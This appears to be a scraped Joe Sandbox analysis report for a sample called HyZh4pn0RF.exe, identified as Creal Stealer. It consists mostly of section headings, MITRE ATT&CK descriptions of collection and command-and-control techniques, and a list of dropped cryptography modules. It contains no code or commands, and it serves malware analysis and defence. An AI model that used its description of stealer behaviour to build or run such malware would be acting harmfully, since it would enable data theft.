Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report HyZh4pn0RF.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Creal Stealer

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_ARC4.pyd

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_Salsa20.pyd

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_chacha20.pyd

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_pkcs1_decode.pyd

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_aes.pyd

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_aesni.pyd

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_arc2.pyd

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_blowfish.pyd

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_cast.pyd

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_cbc.pyd

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_cfb.pyd

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_ctr.pyd

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_des.pyd

C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_des3.pyd

Windows Analysis Report
HyZh4pn0RF.exe

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre